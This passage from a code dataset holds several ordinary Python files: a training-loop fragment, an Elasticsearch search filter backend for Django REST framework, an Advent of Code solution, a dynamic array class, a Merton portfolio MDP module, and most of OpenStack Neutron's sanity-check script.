load_parameter_from_file(config_file_name)\r\n parsed_param = get_parameters(config)\r\n # copy config file to train and test log\r\n shutil.copyfile(config_file_name, os.path.join(parsed_param['TrainLogPath'], config_file_name))\r\n shutil.copyfile(config_file_name, os.path.join(parsed_param['TestLogPath'], config_file_name))\r\n common_param = parsed_param.copy()\r\n del common_param['Parameters']\r\n print(parsed_param)\r\n with open(LogFilePath, 'w') as main_log:\r\n set_log_output(main_log)\r\n start = time.time()\r\n count = 0\r\n results 
= []\r\n for p in parsed_param['Parameters']:\r\n p.update(common_param)\r\n count += 1\r\n print(f'Now is {time_since(start)}', file=main_log)\r\n print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), file=main_log)\r\n print(f\"No {count} Model is training.\", file=main_log, flush=True)\r\n print(p, file=main_log, flush=True)\r\n ret = auto_train(p, output=main_log)\r\n if ret is not None:\r\n results.append((p, *ret))\r\n results.sort(key=lambda x: x[2]['Acc'], reverse=True)\r\n print('\\n\\n\\n\\n\\n', file=main_log)\r\n save_results_to_file(results)\r\n","repo_name":"MstKenway/DeepAnomalyDetection","sub_path":"DeepAnomalyDetectionWithPreciseDifferentiation/auto_train.py","file_name":"auto_train.py","file_ext":"py","file_size_in_byte":9707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14169792199","text":"\"\"\"\nSearch backend. Most likely to be deprecated soon.\n\"\"\"\n\nimport operator\nimport warnings\n\nfrom django_elasticsearch_dsl import fields\nfrom elasticsearch_dsl.query import Q\nfrom rest_framework.filters import BaseFilterBackend\nfrom rest_framework.settings import api_settings\nimport six\n\nfrom ..mixins import FilterBackendMixin\nfrom ...compat import coreapi, coreschema\n\n__title__ = 'django_elasticsearch_dsl_drf.filter_backends.search.historical'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = ('SearchFilterBackend',)\n\n\nclass SearchFilterBackend(BaseFilterBackend, FilterBackendMixin):\n \"\"\"Search filter backend for Elasticsearch.\n\n Example:\n\n >>> from django_elasticsearch_dsl_drf.filter_backends import (\n >>> SearchFilterBackend\n >>> )\n >>> from django_elasticsearch_dsl_drf.viewsets import (\n >>> BaseDocumentViewSet,\n >>> )\n >>>\n >>> # Local article document definition\n >>> from .documents import ArticleDocument\n >>>\n >>> # Local article document serializer\n >>> from .serializers import ArticleDocumentSerializer\n >>>\n >>> class ArticleDocumentView(BaseDocumentViewSet):\n >>>\n >>> document = ArticleDocument\n >>> serializer_class = ArticleDocumentSerializer\n >>> filter_backends = [SearchFilterBackend,]\n >>> search_fields = (\n >>> 'title',\n >>> 'content',\n >>> )\n >>> search_nested_fields = {\n >>> 'state': ['name'],\n >>> 'documents.author': ['title', 'description'],\n >>> }\n \"\"\"\n\n search_param = api_settings.SEARCH_PARAM\n\n def get_search_query_params(self, request):\n \"\"\"Get search query params.\n\n :param request: Django REST framework request.\n :type request: rest_framework.request.Request\n :return: List of search query params.\n :rtype: list\n \"\"\"\n query_params = request.query_params.copy()\n return query_params.getlist(self.search_param, [])\n\n def construct_nested_search(self, request, view):\n \"\"\"Construct nested search.\n\n We have to deal with two types of structures:\n\n Type 1:\n\n >>> search_nested_fields = {\n >>> 'country': {\n >>> 'path': 'country',\n >>> 'fields': ['name'],\n >>> },\n >>> 'city': {\n >>> 'path': 'country.city',\n >>> 'fields': ['name'],\n >>> },\n >>> }\n\n Type 2:\n\n >>> search_nested_fields = {\n >>> 'country': {\n >>> 'path': 'country',\n >>> 'fields': [{'name': {'boost': 2}}]\n >>> },\n >>> 'city': {\n >>> 'path': 'country.city',\n >>> 'fields': [{'name': {'boost': 2}}]\n >>> },\n >>> }\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: 
rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n if not hasattr(view, 'search_nested_fields'):\n return []\n\n # TODO: Support query boosting\n\n query_params = self.get_search_query_params(request)\n __queries = []\n for search_term in query_params:\n for label, options in view.search_nested_fields.items():\n queries = []\n path = options.get('path')\n\n for _field in options.get('fields', []):\n\n # In case if we deal with structure 2\n if isinstance(_field, dict):\n # TODO: take options (such as boost) into consideration\n field = \"{}.{}\".format(path, _field['name'])\n # In case if we deal with structure 1\n else:\n field = \"{}.{}\".format(path, _field)\n\n field_kwargs = {\n field: search_term\n }\n\n queries.append(\n Q(\"match\", **field_kwargs)\n )\n\n __queries.append(\n Q(\n \"nested\",\n path=path,\n query=six.moves.reduce(operator.or_, queries)\n )\n )\n\n return __queries\n\n def construct_search(self, request, view):\n \"\"\"Construct search.\n\n We have to deal with two types of structures:\n\n Type 1:\n\n >>> search_fields = (\n >>> 'title',\n >>> 'description',\n >>> 'summary',\n >>> )\n\n Type 2:\n\n >>> search_fields = {\n >>> 'title': {'boost': 2},\n >>> 'description': None,\n >>> 'summary': None,\n >>> }\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n query_params = self.get_search_query_params(request)\n __queries = []\n for search_term in query_params:\n __values = self.split_lookup_name(search_term, 1)\n __len_values = len(__values)\n if __len_values > 1:\n field, value = __values\n if field in view.search_fields:\n # Initial kwargs for the match query\n field_kwargs = {field: {'query': value}}\n # In case if we deal with structure 2\n if isinstance(view.search_fields, dict):\n extra_field_kwargs = view.search_fields[field]\n if extra_field_kwargs:\n field_kwargs[field].update(extra_field_kwargs)\n # The match query\n __queries.append(\n Q(\"match\", **field_kwargs)\n )\n else:\n for field in view.search_fields:\n # Initial kwargs for the match query\n field_kwargs = {field: {'query': search_term}}\n\n # In case if we deal with structure 2\n if isinstance(view.search_fields, dict):\n extra_field_kwargs = view.search_fields[field]\n if extra_field_kwargs:\n field_kwargs[field].update(extra_field_kwargs)\n\n # The match query\n __queries.append(\n Q(\"match\", **field_kwargs)\n )\n return __queries\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"Filter the queryset.\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n warnings.warn(\n \"{} is deprecated. 
Switch to `CompoundSearchFilterBackend`.\"\n \"\".format(\n self.__class__.__name__\n )\n )\n __queries = self.construct_search(request, view) + \\\n self.construct_nested_search(request, view)\n\n if __queries:\n queryset = queryset.query('bool', should=__queries)\n return queryset\n\n def get_coreschema_field(self, field):\n if isinstance(field, fields.IntegerField):\n field_cls = coreschema.Number\n else:\n field_cls = coreschema.String\n return field_cls()\n\n def get_schema_fields(self, view):\n assert coreapi is not None, 'coreapi must be installed to ' \\\n 'use `get_schema_fields()`'\n assert coreschema is not None, 'coreschema must be installed to ' \\\n 'use `get_schema_fields()`'\n\n _search_fields = getattr(view, 'search_fields', None)\n if isinstance(_search_fields, dict):\n search_fields = list(_search_fields.keys())\n else:\n search_fields = _search_fields\n\n return [] if not search_fields else [\n coreapi.Field(\n name=self.search_param,\n required=False,\n location='query',\n schema=coreschema.String(\n description='Search in '\n '{}.'.format(', '.join(search_fields))\n )\n )\n ]\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/filter_backends/search/historical.py","file_name":"historical.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"18131946904","text":"\"\"\"\npart 1: anyone answered yes\npart 2: everyone answered yes\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n part_1_count, part_2_count = 0, 0\n groups=open(\"input.txt\").read().split(\"\\n\\n\")\n for entry in groups:\n part_1_count+=len(set(entry.replace(\"\\n\", \"\")))\n part_2_count+=len(set.intersection(*map(set, entry.split())))\n print(part_1_count, part_2_count)\n\n\n\n","repo_name":"bethlamacchia/aoc2020","sub_path":"day6/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32414361939","text":"\"\"\"This module makes a dynamic array class without the use of a built-in list class\"\"\"\n\nimport ctypes\nimport sys\n#We're using the ctypes library to make a raw array\n\nclass DynamicArray(object):\n \"\"\"A dynamic list class\"\"\"\n\n def __init__(self):\n \"\"\"initiates the list\"\"\"\n self.element_count = 0 # the initial list is empty\n self.capacity = 1 # by default the list can only accept 1 element\n self.a_list = self.make_array(self.capacity)\n\n def __len__(self):\n \"\"\"returns the number of elements stored in the list\"\"\"\n return self.element_count\n\n def __getitem__(self,k):\n \"\"\"return the item at the given index, k\"\"\"\n if not 0 <= k < self.element_count: # if the index passed isn't between 0 and the length of the array\n return IndexError(\"K is out of bounds!\") # we need to return an error\n\n return self.a_list[k]\n\n def append(self,element):\n \"\"\"add an element to the end of the list\"\"\"\n # if our list is at capacity, we need to make it larger before we add another element\n\n if self.element_count == self.capacity:\n self._resize(2*self.capacity) # double the capacity\n\n self.a_list[self.element_count] = element\n self.element_count += 1\n\n def _resize(self, new_capacity):\n \"\"\"resize the initial array to the new capacity\"\"\"\n b_list = self.make_array(new_capacity) # <~ new, bigger array\n\n for k in range(self.element_count): # reference all existing values 
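# --- Editor's aside (hedged note on the DynamicArray record around this point) ---
# The doubling in _resize gives amortized O(1) appends: each O(n) copy is paid
# for by the n cheap appends that preceded it. Note that the demo loop's
# sys.getsizeof(arr) measures the DynamicArray instance, not the underlying
# ctypes buffer, so its printed size stays flat; sizing the raw buffer itself
# does track capacity:
import sys
import ctypes

for capacity in (1, 2, 4, 8):
    buf = (capacity * ctypes.py_object)()  # raw array, as in make_array above
    print(capacity, sys.getsizeof(buf))    # grows with capacity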
from the initial array into the new one\n b_list[k] = self.a_list[k]\n\n self.a_list = b_list # make the initial array into the bigger array\n self.capacity = new_capacity # set our new bigger capacity\n\n def make_array(self, new_capacity):\n \"\"\"return our array object\"\"\"\n return (new_capacity * ctypes.py_object)()\n\narr = DynamicArray()\n\nfor i in range(10):\n print(len(arr), sys.getsizeof(arr))\n arr.append(i)\n","repo_name":"Laurens-GitHub/Data-Structures-Algorithms","sub_path":"Array Sequences/Other/Dynamic_Array.py","file_name":"Dynamic_Array.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8850306439","text":"import os\nimport re\nimport sys\nimport numpy as np\nfrom typing import TypeVar, NamedTuple, Callable, Mapping, Tuple\n\n\nsys.path.append('../')\nsys.path.append('../MDP')\nfrom MDP.mdp import MDP, MDP_RL, Policy\nimport MDP.mdpUtils as mu\nfrom MDP.rlAlgorithms import MDPAlgorithmRL, MonteCarloEG\nfrom MDP.mdpAlgorithms import MDPAlgorithm, ValueIteration \n\n\nP = TypeVar('P')\n\n'''\nFINANCIAL APPLICATION #1 - Merton's Portfolio Optimization Problem\nSee e.g. https://en.wikipedia.org/wiki/Merton%27s_portfolio_problem\n\n\nFROM CLASS NOTES:\nThink of this as a continuous-time Stochastic Control problem\nThe State is (t, Wt)\nThe Action is [πt, ct]\nThe Reward per unit time is U(ct)\nThe Return is the usual accumulated discounted Reward\nFind Policy : (t, Wt) → [πt, ct] that maximizes the Expected Return\nNote: ct ≥ 0, but πt is unconstrained\n'''\n \n\nclass MertonProblem():\n\n def __init__(self, **kwargs) -> None:\n '''\n Constructor. Declare the parameters that we will be using\n to solve this portfolio optimization model \n ''' \n\n self.rho: float = kwargs[\"rho\"] # Discount rate\n self.T: float = kwargs[\"T\"] # Expiry value\n self.r: float = kwargs[\"r\"] # Riskless rate (return for the riskless asset)\n\n self.W0: float = kwargs[\"W0\"] # Initial wealth\n self.mu: np.ndarray = kwargs[\"mu\"] # Means of the risky rate (1-D array of length = # of Risky Assets)\n self.cov: np.ndarray = kwargs[\"cov\"] # Risky rate covariants (2-D square array of length = # of Risky Assets)\n self.numRiskyAssets = len(self.mu) # The number of risky assets that we have defined for the problem\n\n self.epsilon: float = kwargs[\"epsilon\"] # Bequest parameter for B(T)\n self.gamma: float = kwargs[\"gamma\"] # Parameter for CRRA utility function\n\n self.SIM_TIME = kwargs[\"SIM_TIME\"] # Total simulation time\n\n def utilityFunc(self, x: float) -> float:\n '''\n Utility function for the problem. For Merton's problem we use the \n Constant Relative-Risk Aversion model represented by the gamma param\n '''\n p = 1. 
- self.gamma\n if p == 0:\n result = np.log(x)\n else:\n result = x**p/p\n return result\n\n def getCFOptAllocation(self) -> np.ndarray:\n '''\n Calculates the closed-form solution of the optimal\n stock allocation among the different assets, π(W,t).\n Note however that the function takes no arguments since in the closed-form\n the optimal allocation depends on neither Wealth nor time\n '''\n # Handle the 1D case without matrix operations\n if self.cov.shape == (1,1):\n result = (1/self.cov[0][0])*(self.mu[0]-self.r)/self.gamma\n else:\n result = np.linalg.inv(self.cov).dot(self.mu-self.r)/self.gamma\n return result\n\n\n def getNu(self) -> float:\n '''\n Helper method to calculate the nu-parameter used in \n the defintion of the closed-form solution\n '''\n t1 = (self.mu - self.r).dot(self.getCFOptAllocation())/2*self.gamma\n t2 = self.r/self.gamma\n return (self.rho/self.gamma) - self.gamma*(t1+t2)\n\n\n def getCFOptConsumption(self, t: float) -> float: \n '''\n Calculates the closed-form solution of the optimal fraction\n of wealth to consume at a given time step\n '''\n nu = self.getNu()\n\n if nu == 0:\n optCons = 1./(self.T - t + self.epsilon)\n else:\n optCons = nu / (1. + (nu * self.epsilon - 1) *\n np.exp(-nu * (self.T - t))) \n return optCons\n\n\n def makeDiscretizedMDP(self) -> MDP:\n '''\n Takes the information prescribed for this Merton object\n and builds a discretized MDP out of it so that it can be solved\n using dynamic programming.\n\n To do this we will make several simplifying assumptions:\n - Discretize the state- and action-space so we can solve using a tabular method\n - Since we can't model stochastic dynamics we will make the risky asset only have two possible\n outcomes (+mu and -mu), with 50/50 probability. This assumption lets us directly prescribe\n transition probabilities into the data structure \n \n '''\n mdpData = dict()\n states = set()\n actions = set()\n terminalStates = set()\n\n # Discretize the state- and action-spaces\n # State-space discretization. We will discretize only up to\n # the max limit of growth of wealth by 5 stdevs of the highest value\n # of risky asset return over the total simulation time\n wStep = 0.01\n Wmax = round(self.W0 + (5*(np.max(self.cov)+np.max(self.mu))*self.SIM_TIME),2)\n N = (Wmax // wStep) + 2\n w = 0\n\n for w in np.linspace(0.,Wmax,N):\n for t in range(self.SIM_TIME+1):\n if t == self.SIM_TIME:\n terminalStates.add((round(w,2), t))\n else:\n states.add((round(w,2), t))\n\n # Action-space discretization\n actionStep = 0.01\n aN = (1//actionStep) + 1\n for pi in np.linspace(0, 1, aN):\n for c in np.linspace(0, 1, aN):\n actions.add((pi,c))\n\n # Fill out the dict with our discretized state- and action-spaces. \n for state in states:\n mdpData[state] = dict()\n for action in actions:\n W, t = state\n pi, c = action\n mdpData[state][action] = dict()\n\n # Determine the two possible successor states, for each of the possible\n # two return values of the risky asset.\n # the net of our returns from all assets, less the amount we invested (c_t*W_t)\n # (Note that is NOT the same as reward, which is computed using the utility function) \n wPos = round(W + W*c*((1-pi)*self.r + pi*self.mu[0]), 2) \n wNeg = round(W + W*c*((1-pi)*self.r - pi*self.mu[0]), 2) \n # Assign reward of the final wealth if it's a terminal state. 
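# --- Editor's aside (hedged numeric check for the MertonProblem record above) ---
# With a single risky asset the closed form reduces to
#     pi* = (mu - r) / (gamma * sigma^2),
# which is what getCFOptAllocation() computes in its 1x1 branch. Plugging in
# the parameters from __main__ further below (mu=0.08, r=0.04,
# cov=[[0.0009]], gamma=0.2):
pi_star = (0.08 - 0.04) / (0.2 * 0.0009)  # ~222.2, i.e. heavy leverage
# gamma = 0.2 models very low risk aversion, which is why the optimal
# allocation lands far above 100% of wealth.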
Otherwise\n                # the reward is zero\n                if t == self.SIM_TIME:\n                    tNew = t + 1\n                    rPos = self.utilityFunc(wPos)\n                    rNeg = self.utilityFunc(wNeg)\n                else:\n                    tNew = t\n                    rPos = 0\n                    rNeg = 0\n\n                succPos = (wPos, tNew)\n                succNeg = (wNeg, tNew)\n                # Populate dict\n                if state not in terminalStates:\n                    mdpData[state][action][succPos] = (0.5, rPos) \n                    mdpData[state][action][succNeg] = (0.5, rNeg) \n                else:\n                    mdpData[state][action][state] = (1.0, 0)\n\n        return MDP(mdpData, (1-self.rho))\n\n\n    def makeRLMDP(self) -> MDP_RL:\n        '''\n        Helper method used to transform the parameter definitions for this Merton problem\n        into an MDP representation that can be solved using RL. Here we will prescribe a\n        state-action dict, a dynamics model, and a set of terminal states.\n        '''\n        states = set()\n        terminalStates = set()\n        actions = set()\n        stateActionDict = dict()\n\n        # Discretize the state- and action-spaces\n        # State-space discretization. We will discretize only up to\n        # the max limit of growth of wealth by 5 stdevs of the highest value\n        # of the risky asset return realized for each step of the total simulation time\n        wStep = 0.01\n        Wmax = round(self.W0 + (5*(np.max(self.cov)+np.max(self.mu))*self.SIM_TIME),2)\n        N = int(Wmax // wStep) + 2\n        w = 0\n        print(Wmax)\n        for w in np.linspace(0.,Wmax,N):\n            for t in range(self.SIM_TIME+1):\n                if t == self.SIM_TIME:\n                    terminalStates.add((round(w,2), t))\n                else:\n                    states.add((round(w,2), t))\n        print(states)\n\n        # Action-space discretization\n        actionStep = 0.01\n        aN = int(1 // actionStep) + 1\n        for pi in np.linspace(0, 1, aN):\n            for c in np.linspace(0, 1, aN):\n                actions.add((pi,c))\n\n        # Form the state-action dictionary\n        for state in states:\n            stateActionDict[state] = set()\n            for action in actions:\n                stateActionDict[state].add(action)\n\n\n        # Declare the dynamics model to increment the state\n        def dynamics(state, action):\n            W, t = state\n            pi, c = action\n\n            # Increment time forward\n            tNew = t + 1\n\n            # Increment wealth forward based on action\n            wNew = W + W*c*((1-pi)*self.r + pi*np.sum(np.random.multivariate_normal(self.mu, self.cov, 1))) \n            wNew = round(wNew, 2)\n\n            # Form the new successor state\n            succState = (wNew, tNew)\n\n            # If we move into a terminal state, calculate the terminal utility\n            # as reward. 
Otherwise, reward is zero\n if tNew == self.SIM_TIME:\n reward = self.utilityFunc(wNew)\n else:\n reward = 0\n\n return succState, reward\n\n return MDP_RL(stateActionDict, terminalStates, dynamics)\n\n\nif __name__ == \"__main__\":\n # Declare params for a simple case with one risky asset\n # and one riskless asset\n params = dict()\n params[\"T\"] = 0.4\n params[\"rho\"] = 0.04\n params[\"r\"] = 0.04\n\n params[\"W0\"] = 1.00\n params[\"mu\"] = np.array([0.08])\n params[\"cov\"] = np.array([[0.0009]])\n\n params[\"epsilon\"] = 1e-8\n params[\"gamma\"] = 0.2\n\n params[\"SIM_TIME\"] = 5\n\n # Instantiate the object\n mp = MertonProblem(**params)\n\n # First, calculate the closed-form solution over our time range\n # for both allocation (constant) and consumption (return the optimal\n # consumption fraction for each timestep)\n optAlloc = mp.getCFOptAllocation()\n optCons = [mp.getCFOptConsumption(t*mp.T/mp.SIM_TIME) for t in range(mp.SIM_TIME)]\n # print(optAlloc) \n # print(optCons) \n\n # RL Solution\n ############################################\n # # Create the RL MDP representation\n # rl_mdp = mp.makeRLMDP()\n\n # # Make a random policy out of the info\n # polData = dict()\n # for state in rl_mdp.stateActionDict.keys():\n # polData[state] = dict()\n # numActions = len(rl_mdp.stateActionDict[state])\n # for action in rl_mdp.stateActionDict[state]:\n # polData[state][action] = 1/numActions\n # startPol = Policy(polData)\n \n # # Instantiate the MC solver\n # mc_eg = MonteCarloEG(rl_mdp, 1-params[\"rho\"])\n \n # startState = (params[\"W0\"], 0)\n\n # # Run simulation and perform model-free policy iteration\n # # using EG policy improvement\n # policy, optValue = mc_eg.simulate_eg(startState, startPol, 100)\n\n # # Report the results\n # for state in policy.polData.keys():\n # maxAct, _ = mu.maximizeOverDict(policy.polData[state])\n # print(maxAct)\n\n ############################################\n\n\n # Discrete MDP solution\n ############################################\n # Create the MDP representation\n mdp = mp.makeDiscretizedMDP()\n\n # Solve using value iteration\n vi = ValueIteration(1e-8)\n vi.solve(mdp)\n\n print(vi.V)\n print(vi.pi)\n\n\n","repo_name":"anatu/Stanford-CME241-W2020","sub_path":"financial_applications/merton_v2.py","file_name":"merton_v2.py","file_ext":"py","file_size_in_byte":11514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"8670256671","text":"import sys\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\n\nfrom neutron._i18n import _\nfrom neutron.agent import dhcp_agent\nfrom neutron.cmd.sanity import checks\nfrom neutron.common import config\nfrom neutron.conf.agent import common as agent_config\nfrom neutron.conf.agent import securitygroups_rpc\nfrom neutron.conf import common as common_config\nfrom neutron.conf.db import l3_hamode_db\nfrom neutron.conf.plugins.ml2 import config as ml2_conf\nfrom neutron.conf.plugins.ml2.drivers import linuxbridge as lb_conf\nfrom neutron.conf.plugins.ml2.drivers.mech_sriov import agent_common as \\\n sriov_conf\nfrom neutron.conf.plugins.ml2.drivers import ovs_conf\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef setup_conf():\n config.register_common_config_options()\n ovs_conf.register_ovs_agent_opts(cfg.CONF)\n lb_conf.register_linuxbridge_opts(cfg.CONF)\n sriov_conf.register_agent_sriov_nic_opts(cfg.CONF)\n ml2_conf.register_ml2_plugin_opts(cfg.CONF)\n securitygroups_rpc.register_securitygroups_opts(cfg.CONF)\n 
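# Each register_* call in this function only declares options on the global\n    # cfg.CONF namespace; concrete values are bound later, when config.init()\n    # parses the CLI arguments and config files in main() below.\n    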
dhcp_agent.register_options(cfg.CONF)\n l3_hamode_db.register_db_l3_hamode_opts(cfg.CONF)\n common_config.register_core_common_config_opts(cfg.CONF)\n\n\nclass BoolOptCallback(cfg.BoolOpt):\n def __init__(self, name, callback, **kwargs):\n if 'default' not in kwargs:\n kwargs['default'] = False\n self.callback = callback\n super(BoolOptCallback, self).__init__(name, **kwargs)\n\n\ndef check_ovs_vxlan():\n result = checks.ovs_vxlan_supported()\n if not result:\n LOG.error('Check for Open vSwitch VXLAN support failed. '\n 'Please ensure that the version of openvswitch '\n 'being used has VXLAN support.')\n return result\n\n\ndef check_ovs_geneve():\n result = checks.ovs_geneve_supported()\n if not result:\n LOG.error('Check for Open vSwitch Geneve support failed. '\n 'Please ensure that the version of openvswitch '\n 'and kernel being used has Geneve support.')\n return result\n\n\ndef check_iproute2_vxlan():\n result = checks.iproute2_vxlan_supported()\n if not result:\n LOG.error('Check for iproute2 VXLAN support failed. Please ensure '\n 'that the iproute2 has VXLAN support.')\n return result\n\n\ndef check_ovs_patch():\n result = checks.patch_supported()\n if not result:\n LOG.error('Check for Open vSwitch patch port support failed. '\n 'Please ensure that the version of openvswitch '\n 'being used has patch port support or disable features '\n 'requiring patch ports (gre/vxlan, etc.).')\n return result\n\n\ndef check_read_netns():\n required = checks.netns_read_requires_helper()\n if not required and cfg.CONF.AGENT.use_helper_for_ns_read:\n LOG.warning(\"The user that is executing neutron can read the \"\n \"namespaces without using the root_helper. Disable \"\n \"the use_helper_for_ns_read option to avoid a \"\n \"performance impact.\")\n # Don't fail because nothing is actually broken. Just not optimal.\n result = True\n elif required and not cfg.CONF.AGENT.use_helper_for_ns_read:\n LOG.error(\"The user that is executing neutron does not have \"\n \"permissions to read the namespaces. Enable the \"\n \"use_helper_for_ns_read configuration option.\")\n result = False\n else:\n # everything is configured appropriately\n result = True\n return result\n\n\n# NOTE(ihrachyshka): since the minimal version is currently capped due to\n# missing hwaddr matching in dnsmasq < 2.67, a better version of the check\n# would actually start dnsmasq server and issue a DHCP request using a IPv6\n# DHCP client.\ndef check_dnsmasq_version():\n result = checks.dnsmasq_version_supported()\n if not result:\n LOG.error('The installed version of dnsmasq is too old. '\n 'Please update to at least version %s.',\n checks.get_minimal_dnsmasq_version_supported())\n return result\n\n\ndef check_ovs_qos_direct_ports_supported():\n result = checks.ovs_qos_direct_port_supported()\n if not result:\n LOG.error('The installed version of OVS does not support '\n 'QoS rules for direct ports. '\n 'Please update to version %s or newer.',\n checks.get_ovs_version_for_qos_direct_port_support())\n return result\n\n\ndef check_dnsmasq_local_service_supported():\n result = checks.dnsmasq_local_service_supported()\n if not result:\n LOG.error('The installed version of dnsmasq is too old. '\n 'Please update to a version supporting the '\n '--local-service option.')\n return result\n\n\ndef check_keepalived_ipv6_support():\n result = checks.keepalived_ipv6_supported()\n if not result:\n LOG.error('The installed version of keepalived does not support '\n 'IPv6. 
Please update to at least version 1.2.10 for '\n                  'IPv6 support.')\n    return result\n\n\ndef check_keepalived_garp_on_sighup_support():\n    result = checks.keepalived_garp_on_sighup_supported()\n    if not result:\n        LOG.error('The installed version of keepalived may not support '\n                  'sending gratuitous ARP on SIGHUP, which may delay '\n                  'dataplane downtime during HA router failover. '\n                  'Please use at least version 1.2.20 which supports '\n                  'sending garp on SIGHUP.')\n    return result\n\n\ndef check_dibbler_version():\n    result = checks.dibbler_version_supported()\n    if not result:\n        LOG.error('The installed version of dibbler-client is too old. '\n                  'Please update to at least version %s.',\n                  checks.get_minimal_dibbler_version_supported())\n    return result\n\n\ndef check_nova_notify():\n    result = checks.nova_notify_supported()\n    if not result:\n        LOG.error('Nova notifications are enabled, but novaclient is not '\n                  'installed. Either disable nova notifications or '\n                  'install python-novaclient.')\n    return result\n\n\ndef check_arp_responder():\n    result = checks.arp_responder_supported()\n    if not result:\n        LOG.error('Check for Open vSwitch ARP responder support failed. '\n                  'Please ensure that the version of openvswitch '\n                  'being used has ARP flows support.')\n    return result\n\n\ndef check_arp_header_match():\n    result = checks.arp_header_match_supported()\n    if not result:\n        LOG.error('Check for Open vSwitch support of ARP header matching '\n                  'failed. ARP spoofing suppression will not work. A '\n                  'newer version of OVS is required.')\n    return result\n\n\ndef check_icmpv6_header_match():\n    result = checks.icmpv6_header_match_supported()\n    if not result:\n        LOG.error('Check for Open vSwitch support of ICMPv6 header '\n                  'matching failed. ICMPv6 Neighbor Advt spoofing (part '\n                  'of arp spoofing) suppression will not work. A newer '\n                  'version of OVS is required.')\n    return result\n\n\ndef check_ovsdb_native():\n    result = checks.ovsdb_native_supported()\n    if not result:\n        LOG.error('Check for native OVSDB support failed.')\n    return result\n\n\ndef check_ovs_conntrack():\n    result = checks.ovs_conntrack_supported()\n    if not result:\n        LOG.error('Check for Open vSwitch support of conntrack support '\n                  'failed. OVS/CT firewall will not work. A newer '\n                  'version of OVS (2.5+) and linux kernel (4.3+) are '\n                  'required. See '\n                  'https://github.com/openvswitch/ovs/blob/master/FAQ.md '\n                  'for more information.')\n    return result\n\n\ndef check_gre_conntrack():\n    result = checks.gre_conntrack_supported()\n    if not result:\n        LOG.warning('Kernel module %s is not loaded. GRE tunnels from '\n                    'VM to VM will not work with OVS firewall driver.',\n                    checks.CONNTRACK_GRE_MODULE)\n    return result\n\n\ndef check_ebtables():\n    result = checks.ebtables_supported()\n    if not result:\n        LOG.error('Cannot run ebtables. Please ensure that it '\n                  'is installed.')\n    return result\n\n\ndef check_ipset():\n    result = checks.ipset_supported()\n    if not result:\n        LOG.error('Cannot run ipset. Please ensure that it '\n                  'is installed.')\n    return result\n\n\ndef check_ip6tables():\n    result = checks.ip6tables_supported()\n    if not result:\n        LOG.error('Cannot run ip6tables. Please ensure that it '\n                  'is installed.')\n    return result\n\n\ndef check_conntrack():\n    result = checks.conntrack_supported()\n    if not result:\n        LOG.error('Cannot run conntrack. Please ensure that it '\n                  'is installed.')\n    return result\n\n\ndef check_dhcp_release6():\n    result = checks.dhcp_release6_supported()\n    if not result:\n        LOG.error('No dhcp_release6 tool detected. 
The installed version '\n 'of dnsmasq does not support releasing IPv6 leases. '\n 'Please update to at least version %s if you need this '\n 'feature. If you do not use IPv6 stateful subnets you '\n 'can continue to use this version of dnsmasq, as '\n 'other IPv6 address assignment mechanisms besides '\n 'stateful DHCPv6 should continue to work without '\n 'the dhcp_release6 utility. '\n 'Current version of dnsmasq is ok if other checks '\n 'pass.',\n checks.get_dnsmasq_version_with_dhcp_release6())\n return result\n\n\ndef check_bridge_firewalling_enabled():\n result = checks.bridge_firewalling_enabled()\n if not result:\n LOG.error('Bridge firewalling is not enabled. It may be the case '\n 'that bridge and/or br_netfilter kernel modules are not '\n 'loaded. Alternatively, corresponding sysctl settings '\n 'may be overridden to disable it by default.')\n return result\n\n\ndef check_ip_nonlocal_bind():\n result = checks.ip_nonlocal_bind()\n if not result:\n LOG.error('This kernel does not isolate ip_nonlocal_bind kernel '\n 'option in namespaces. Please update to kernel '\n 'version > 3.19.')\n return result\n\n\ndef check_min_tx_rate_support():\n result = checks.min_tx_rate_support()\n if not result:\n LOG.warning('There are SR-IOV network interfaces that do not support '\n 'setting the minimum TX rate (dataplane enforced minimum '\n 'guaranteed bandwidth) \"ip-link vf min_tx_rate\".')\n return result\n\n\ndef check_ovn_nb_db_schema_port_group_support():\n result = checks.ovn_nb_db_schema_port_group_supported()\n if not result:\n LOG.warning('OVN NB DB schema does not support Port_Group. This '\n 'support was added in DB schema version 5.11.')\n return result\n\n\ndef check_ovn_nb_db_schema_stateless_nat():\n result = checks.ovn_nb_db_schema_stateless_nat_supported()\n if not result:\n LOG.warning('OVN NB DB schema does not support stateless NAT. This '\n 'support was added in DB schema version 5.17.')\n return result\n\n\ndef check_ovn_sb_db_schema_virtual_port():\n result = 